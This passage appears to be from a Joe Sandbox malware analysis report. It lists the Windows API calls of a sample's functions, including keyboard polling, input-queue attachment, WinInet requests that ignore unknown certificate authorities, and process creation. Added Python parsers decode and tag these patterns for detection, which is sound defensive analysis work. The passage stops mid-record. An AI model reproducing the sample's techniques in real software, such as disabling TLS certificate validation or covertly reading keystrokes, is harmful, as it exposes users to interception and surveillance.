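A small parser for the "APIs" lists in these function entries, added here as a worked example; it is not code from Joe Sandbox or from the report. It splits report text at the `APIs` headers, decodes the virtual-key arguments of the `GetAsyncKeyState`/`GetKeyState` calls in the entry at 002B0530 (0xA0/0xA1 are VK_LSHIFT/VK_RSHIFT, 0x11 VK_CONTROL, 0x12 VK_MENU, 0x5B VK_LWIN in winuser.h), and tags the call combinations seen in the entries at 002B19EF (GetForegroundWindow + GetWindowThreadProcessId + AttachThreadInput), 002C8AED (CoCreateInstance) and 002BBB13 (SetErrorMode(1), i.e. SEM_FAILCRITICALERRORS, around GetDiskFreeSpaceW). The tag names and the rules behind them are this example's own choices; the sample block is copied from those four entries.

```python
"""Parse the per-function "APIs" lists of a Joe Sandbox report and tag the
capability patterns they form.  Added example; tag names/rules are its own."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

# One API line in the report looks like one of:
#   • GetAsyncKeyState.USER32(000000A0), ref: 002B05B1
#   • CoInitialize.OLE32 ref: 002C8AED                    (no argument list)
#   • Part of subcall function 00254D37: __itow.LIBCMT ref: 00254D62
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

# Virtual-key codes from winuser.h; the function at 002B0530 polls five of them.
VK_NAMES: Dict[int, str] = {
    0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN", 0x5C: "VK_RWIN",
    0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0xA2: "VK_LCONTROL", 0xA3: "VK_RCONTROL",
    0xA4: "VK_LMENU", 0xA5: "VK_RMENU",
}

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]          # raw argument tokens; "?" means the sandbox could not resolve it
    ref: int                 # call-site address
    caller: Optional[int]    # set for "Part of subcall function" lines

def parse_api_lines(text: str) -> List[ApiCall]:
    """Return the API calls of one block in report order; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [a for a in m["args"].split(",") if a] if m["args"] is not None else []
        caller = int(m["caller"], 16) if m["caller"] else None
        calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16), caller))
    return calls

def split_functions(report: str) -> List[List[ApiCall]]:
    """Split report text at its "APIs" headers, one call list per function entry."""
    out = []
    for block in re.split(r"^\s*APIs\s*$", report, flags=re.M):
        calls = parse_api_lines(block)
        if calls:
            out.append(calls)
    return out

def polled_keys(calls: List[ApiCall]) -> List[str]:
    """Decode the virtual-key argument of each GetAsyncKeyState/GetKeyState call (deduplicated)."""
    keys: List[str] = []
    for c in calls:
        if c.api in ("GetAsyncKeyState", "GetKeyState") and c.args and c.args[0] != "?":
            code = int(c.args[0], 16)
            name = VK_NAMES.get(code, f"VK_{code:02X}")
            if name not in keys:
                keys.append(name)
    return keys

def tag_capabilities(calls: List[ApiCall]) -> Set[str]:
    """Map API co-occurrence inside one function to capability tags."""
    names = {c.api for c in calls}
    tags: Set[str] = set()
    if names & {"GetAsyncKeyState", "GetKeyState", "GetKeyboardState"}:
        tags.add("keyboard-state-polling")
        keys = polled_keys(calls)
        # Only modifier keys polled: what an input synthesizer checks before it sends
        # keystrokes.  A keylogger would also read printable keys.
        if keys and all(k in VK_NAMES.values() for k in keys):
            tags.add("modifier-keys-only")
    if {"GetForegroundWindow", "GetWindowThreadProcessId", "AttachThreadInput"} <= names:
        tags.add("foreground-input-attach")   # joins the active window's input queue
    if names & {"CoCreateInstance", "CoGetObject", "CoGetInstanceFromFile", "GetRunningObjectTable"}:
        tags.add("com-object-instantiation")
    # SetErrorMode(1) is SEM_FAILCRITICALERRORS: no "insert a disk" dialog can interrupt
    # a GetDiskFreeSpaceW probe of an absent or removable drive.
    if "GetDiskFreeSpaceW" in names and any(
            c.api == "SetErrorMode" and c.args[:1] == ["00000001"] for c in calls):
        tags.add("silent-drive-probe")
    return tags

# Lines copied from the report's entries at 002B0530, 002B19EF, 002C8AED and 002BBB13.
SAMPLE = """\
APIs
• GetKeyboardState.USER32(?), ref: 002B0530
• GetAsyncKeyState.USER32(000000A0), ref: 002B05B1
• GetKeyState.USER32(000000A0), ref: 002B05CC
• GetAsyncKeyState.USER32(00000011), ref: 002B0613
• GetAsyncKeyState.USER32(00000012), ref: 002B063D
• GetAsyncKeyState.USER32(0000005B), ref: 002B0667
APIs
• GetCurrentThreadId.KERNEL32 ref: 002B19EF
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,002B0A67,?,00000001), ref: 002B1A03
• GetWindowThreadProcessId.USER32(00000000), ref: 002B1A0A
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002B0A67,?,00000001), ref: 002B1A19
APIs
  • Part of subcall function 00254D37: __itow.LIBCMT ref: 00254D62
• CoInitialize.OLE32 ref: 002C8AED
• CoCreateInstance.OLE32(?,00000000,00000017,002E3BBC,?), ref: 002C8B58
APIs
• SetErrorMode.KERNEL32(00000001), ref: 002BBB13
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 002BBB89
• GetLastError.KERNEL32 ref: 002BBB93
• SetErrorMode.KERNEL32(00000000,READY), ref: 002BBC00
"""
```

Run `split_functions(SAMPLE)` and call `tag_capabilities` on each list to see one tag set per entry. Two caveats the tags encode: polling only the shift/ctrl/alt/win keys, as the 002B0530 function does, is what a keystroke synthesizer does to save and restore modifier state before sending input, so on its own it is weaker evidence of a keylogger than the report's "retrieve information about pressed keystrokes" signature suggests; and attaching to the foreground window's thread input queue before sending is the usual way to force focus onto a target window, which is why it sits next to the `Send`-style routine rather than in a hooking routine.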
                                                          APIs
                                                          • GetSysColor.USER32(00000008), ref: 0025260D
                                                          • SetTextColor.GDI32(?,000000FF), ref: 00252617
                                                          • SetBkMode.GDI32(?,00000001), ref: 0025262C
                                                          • GetStockObject.GDI32(00000005), ref: 00252634
                                                          • GetClientRect.USER32(?), ref: 0028C0FC
                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 0028C113
                                                          • GetWindowDC.USER32(?), ref: 0028C11F
                                                          • GetPixel.GDI32(00000000,?,?), ref: 0028C12E
                                                          • ReleaseDC.USER32(?,00000000), ref: 0028C140
                                                          • GetSysColor.USER32(00000005), ref: 0028C15E
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                          • String ID:
                                                          • API String ID: 3430376129-0
                                                          • Opcode ID: ae1950a82574fab518bc06f9e99e0863778365d7862a6af02bc0edf310a0393d
                                                          • Instruction ID: 5dda4bfc7f43364f8014eef7a6edc99c66337d07cfef3d066973fb80c08cef7d
                                                          • Opcode Fuzzy Hash: ae1950a82574fab518bc06f9e99e0863778365d7862a6af02bc0edf310a0393d
                                                          • Instruction Fuzzy Hash: 5F119031140245FFDB615FA4EC8CBA97B75EB08322F504221FA29990E1CBB109A6EF20
                                                          APIs
                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0025ADE1
                                                          • OleUninitialize.OLE32(?,00000000), ref: 0025AE80
                                                          • UnregisterHotKey.USER32(?), ref: 0025AFD7
                                                          • DestroyWindow.USER32(?), ref: 00292F64
                                                          • FreeLibrary.KERNEL32(?), ref: 00292FC9
                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00292FF6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                          • String ID: close all
                                                          • API String ID: 469580280-3243417748
                                                          • Opcode ID: 0f5f234270e5efe431b5b40fd9fea45b7bbe1c063367c72105f234944a4a3de8
                                                          • Instruction ID: 9994690198b518d62db60b3fea421207b4feed55d4559e0614c2f99228d2c9d7
                                                          • Opcode Fuzzy Hash: 0f5f234270e5efe431b5b40fd9fea45b7bbe1c063367c72105f234944a4a3de8
                                                          • Instruction Fuzzy Hash: 2BA17C30721212DFCB29EF14C899A69F364FF04701F1442ADE80AAB651CB31AD7ACF95
                                                          APIs
                                                          • EnumChildWindows.USER32(?,002AB13A), ref: 002AB078
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ChildEnumWindows
                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                          • API String ID: 3555792229-1603158881
                                                          • Opcode ID: e26621511f06cecb6fd112d6a25f8109e1703e267a76786f975f3fb2e93c8859
                                                          • Instruction ID: afb7bd7c4f4f881f8466cb4c7c4786123ef4de8c5eaf239f0acf4273b2c8caf8
                                                          • Opcode Fuzzy Hash: e26621511f06cecb6fd112d6a25f8109e1703e267a76786f975f3fb2e93c8859
                                                          • Instruction Fuzzy Hash: D191A370520606EFCB19EF60C481BEEFB74BF06300F54811AE85AA7191DF3169B9DB91
                                                          APIs
                                                          • SetWindowLongW.USER32(?,000000EB), ref: 0025327E
                                                            • Part of subcall function 0025218F: GetClientRect.USER32(?,?), ref: 002521B8
                                                            • Part of subcall function 0025218F: GetWindowRect.USER32(?,?), ref: 002521F9
                                                            • Part of subcall function 0025218F: ScreenToClient.USER32(?,?), ref: 00252221
                                                          • GetDC.USER32 ref: 0028D073
                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0028D086
                                                          • SelectObject.GDI32(00000000,00000000), ref: 0028D094
                                                          • SelectObject.GDI32(00000000,00000000), ref: 0028D0A9
                                                          • ReleaseDC.USER32(?,00000000), ref: 0028D0B1
                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0028D13C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                          • String ID: U
                                                          • API String ID: 4009187628-3372436214
                                                          • Opcode ID: 574f4552bcf20c73f2b155354d2db81452e67659c8b21b1ad934e596890fd036
                                                          • Instruction ID: a327ad84ef631eb371b2ca2c07a4c81ee9d5e69024ed7110cdb5ec466a8b0af9
                                                          • Opcode Fuzzy Hash: 574f4552bcf20c73f2b155354d2db81452e67659c8b21b1ad934e596890fd036
                                                          • Instruction Fuzzy Hash: A4714634421206DFCF21EF64C884AAA7BB5FF49361F144265ED559A1E5C7318CA9DF20
                                                          APIs
                                                            • Part of subcall function 002529E2: GetWindowLongW.USER32(?,000000EB), ref: 002529F3
                                                            • Part of subcall function 00252714: GetCursorPos.USER32(?), ref: 00252727
                                                            • Part of subcall function 00252714: ScreenToClient.USER32(003177B0,?), ref: 00252744
                                                            • Part of subcall function 00252714: GetAsyncKeyState.USER32(00000001), ref: 00252769
                                                            • Part of subcall function 00252714: GetAsyncKeyState.USER32(00000002), ref: 00252777
                                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 002DC69C
                                                          • ImageList_EndDrag.COMCTL32 ref: 002DC6A2
                                                          • ReleaseCapture.USER32 ref: 002DC6A8
                                                          • SetWindowTextW.USER32(?,00000000), ref: 002DC752
                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 002DC765
                                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 002DC847
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                          • API String ID: 1924731296-2107944366
                                                          • Opcode ID: 2732ec0d351679027254ad945b3b6b0ae3f906ac0e4fda8a41fed3e8c74824f9
                                                          • Instruction ID: 30e7e25dd7ea951ba39c7dce669a65bd14d542d38fe46b581e5d86fc4cecf9e4
                                                          • Opcode Fuzzy Hash: 2732ec0d351679027254ad945b3b6b0ae3f906ac0e4fda8a41fed3e8c74824f9
                                                          • Instruction Fuzzy Hash: D051AD70218205AFD705EF14CC9AFAA77F5EB88310F14851AF955872E1CB70ADA9CF62
                                                          APIs
                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002C211C
                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 002C2148
                                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 002C218A
                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 002C219F
                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002C21AC
                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 002C21DC
                                                          • InternetCloseHandle.WININET(00000000), ref: 002C2223
                                                            • Part of subcall function 002C2B4F: GetLastError.KERNEL32(?,?,002C1EE3,00000000,00000000,00000001), ref: 002C2B64
                                                            • Part of subcall function 002C2B4F: SetEvent.KERNEL32(?,?,002C1EE3,00000000,00000000,00000001), ref: 002C2B79
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                          • String ID:
                                                          • API String ID: 2603140658-3916222277
                                                          • Opcode ID: 873fc61b6bfd843892ba7dea675c0f20d379c5ac1b307695089cb6b75c043575
                                                          • Instruction ID: 4621a0b6414206511db66f6a2ebbb17613162e918a99fd1139fda30eb213b435
                                                          • Opcode Fuzzy Hash: 873fc61b6bfd843892ba7dea675c0f20d379c5ac1b307695089cb6b75c043575
                                                          • Instruction Fuzzy Hash: B441A1B1550219FFEB129F50DC89FBB7BACEF08354F04421AFE049A141DBB09D598BA1
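The WinInet record above is the one a practitioner should read carefully: the function opens a connection, builds a request, reads option 0x1F and writes it back with 0x100 before HttpSendRequestW. In WinInet, option 0x1F is INTERNET_OPTION_SECURITY_FLAGS and bit 0x100 is SECURITY_FLAG_IGNORE_UNKNOWN_CA, so the query-then-set pair is how a client tells WinInet to accept a server certificate from an untrusted CA. The Python below is an added example, not part of the Joe Sandbox report: it parses the report's "APIs" lines as printed, decodes the WinInet constants, and flags that pattern. Reading the third InternetSetOptionW argument as the flag value is an assumption (the parameter is formally a buffer pointer; the sandbox prints the raw stack slot), and the code labels it as such. The sample input is the list of API lines copied from the record above.

```python
"""Parse the "APIs" lines of a Joe Sandbox function record and decode WinInet arguments.

Added example, not code from the Joe Sandbox report. Input lines look like
"Name.MODULE(arg,arg,...), ref: ADDR", optionally prefixed with a bullet and
"Part of subcall function ADDR:". Unresolved arguments are printed as "?".
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

API_LINE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function (?P<subfn>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# WinInet constants (values from wininet.h).
INTERNET_OPTION = {0x1F: "INTERNET_OPTION_SECURITY_FLAGS"}
SECURITY_FLAGS = {
    0x00000080: "SECURITY_FLAG_IGNORE_REVOCATION",
    0x00000100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x00000200: "SECURITY_FLAG_IGNORE_WRONG_USAGE",
    0x00001000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x00002000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
}
HTTP_QUERY = {5: "HTTP_QUERY_CONTENT_LENGTH", 19: "HTTP_QUERY_STATUS_CODE",
              22: "HTTP_QUERY_RAW_HEADERS_CRLF"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list                  # int for 8-digit hex, None for "?", str for literals
    ref: int
    subcall_of: Optional[int] = None


def _arg(token: str):
    if token == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", token):
        return int(token, 16)
    return token                # e.g. an inline string literal such as "close all"


def parse_api_lines(text: str) -> list[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m["args"]
        args = [] if raw is None else [_arg(a.strip()) for a in raw.split(",")]
        sub = int(m["subfn"], 16) if m["subfn"] else None
        calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), sub))
    return calls


def security_flag_names(value: int) -> list[str]:
    """Expand a SECURITY_FLAG_* bit mask; unknown bits are kept as a hex remainder."""
    names = [n for bit, n in SECURITY_FLAGS.items() if value & bit]
    rest = value & ~sum(SECURITY_FLAGS)
    if rest:
        names.append(f"0x{rest:08X}")
    return names


def describe(call: ApiCall) -> str:
    a = call.args
    if call.name.startswith("InternetSetOption") and len(a) >= 4 and a[1] == 0x1F:
        # ASSUMPTION: parameter 3 is lpBuffer; the report's 0x100 is taken to be the
        # DWORD the sandbox resolved behind that pointer rather than the pointer itself.
        shown = ", ".join(security_flag_names(a[2])) if isinstance(a[2], int) else "?"
        return f"sets INTERNET_OPTION_SECURITY_FLAGS := {shown} (assumed resolved value)"
    if call.name.startswith("InternetQueryOption") and len(a) >= 2 and a[1] in INTERNET_OPTION:
        return f"reads {INTERNET_OPTION[a[1]]}"
    if call.name.startswith("HttpQueryInfo") and len(a) >= 2 and isinstance(a[1], int):
        return f"queries {HTTP_QUERY.get(a[1], f'info level {a[1]}')}"
    return ""


def relaxes_tls_validation(calls: list[ApiCall]) -> bool:
    """True when SECURITY_FLAGS is read, then re-set, before the request is sent."""
    def first(prefix):
        return next((i for i, c in enumerate(calls) if c.name.startswith(prefix)), None)
    q, s, send = first("InternetQueryOption"), first("InternetSetOption"), first("HttpSendRequest")
    if None in (q, s, send) or not (q < s < send):
        return False
    return (len(calls[q].args) > 1 and calls[q].args[1] == 0x1F
            and len(calls[s].args) > 1 and calls[s].args[1] == 0x1F)


# The "APIs" entries of the WinInet record above, copied from the report.
SAMPLE = """
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002C211C
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 002C2148
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 002C218A
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 002C219F
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002C21AC
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 002C21DC
• InternetCloseHandle.WININET(00000000), ref: 002C2223
  • Part of subcall function 002C2B4F: GetLastError.KERNEL32(?,?,002C1EE3,00000000,00000000,00000001), ref: 002C2B64
"""

if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for c in parsed:
        print(f"{c.ref:08X} {c.name:<22} {describe(c)}")
    print("relaxes TLS validation:", relaxes_tls_validation(parsed))
```

The same parser handles every "APIs" block in this report, including the indented "Part of subcall function" entries, so it can be pointed at the whole export; only the WinInet decoding is specific to this record.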
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,002E0980), ref: 002C9412
                                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,002E0980), ref: 002C9446
                                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 002C95C0
                                                          • SysFreeString.OLEAUT32(?), ref: 002C95EA
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                          • String ID:
                                                          • API String ID: 560350794-0
                                                          • Opcode ID: f7e3542e3f84d9b1f3f59aa6259ca248671582e079dc7398a0aa33da4a5feb52
                                                          • Instruction ID: 60172a0472ec491ef68b0acef2e0667a32d20491a4dd0ccd81857db8702f6ae6
                                                          • Opcode Fuzzy Hash: f7e3542e3f84d9b1f3f59aa6259ca248671582e079dc7398a0aa33da4a5feb52
                                                          • Instruction Fuzzy Hash: D5F12C71A20209EFCF14DF94C888EAEB7B9FF45315F108198F905AB251DB71AE96CB50
                                                          APIs
                                                          • _memset.LIBCMT ref: 002CFD9E
                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 002CFF31
                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 002CFF55
                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002CFF95
                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002CFFB7
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 002D0133
                                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 002D0165
                                                          • CloseHandle.KERNEL32(?), ref: 002D0194
                                                          • CloseHandle.KERNEL32(?), ref: 002D020B
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                          • String ID:
                                                          • API String ID: 4090791747-0
                                                          • Opcode ID: 879c614d3bf2e140419d53ae6b5a0b0622f9797562616ed7228c3200a6b9f61f
                                                          • Instruction ID: 80ccb0164d4f6aac54bf6993c2f44dd422644fdf4ba556e8ae1e087d3690c552
                                                          • Opcode Fuzzy Hash: 879c614d3bf2e140419d53ae6b5a0b0622f9797562616ed7228c3200a6b9f61f
                                                          • Instruction Fuzzy Hash: 6DE19D312243419FC714EF24C895B6ABBE1EF85314F14856DF8899B2A2CB71EC65CF52
                                                          APIs
                                                            • Part of subcall function 002B4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002B3B8A,?), ref: 002B4BE0
                                                            • Part of subcall function 002B4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002B3B8A,?), ref: 002B4BF9
                                                            • Part of subcall function 002B4FEC: GetFileAttributesW.KERNEL32(?,002B3BFE), ref: 002B4FED
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 002B52FB
                                                          • _wcscmp.LIBCMT ref: 002B5315
                                                          • MoveFileW.KERNEL32(?,?), ref: 002B5330
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                          • String ID:
                                                          • API String ID: 793581249-0
                                                          • Opcode ID: cd9b255390f9b173276f90ce09a026e6f9c9a1425e8112852dd9f428cdbd3e38
                                                          • Instruction ID: b21c30c11c6ef7d0ca74577a576111613fc5977ecae9ac7bf0f9b123d221fee6
                                                          • Opcode Fuzzy Hash: cd9b255390f9b173276f90ce09a026e6f9c9a1425e8112852dd9f428cdbd3e38
                                                          • Instruction Fuzzy Hash: 255194B20187959BC724EFA0D881ADFB3EC9F84340F50491EF689C7152EF74A698CB56
                                                          APIs
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 002D8D24
                                                          Memory Dump Source
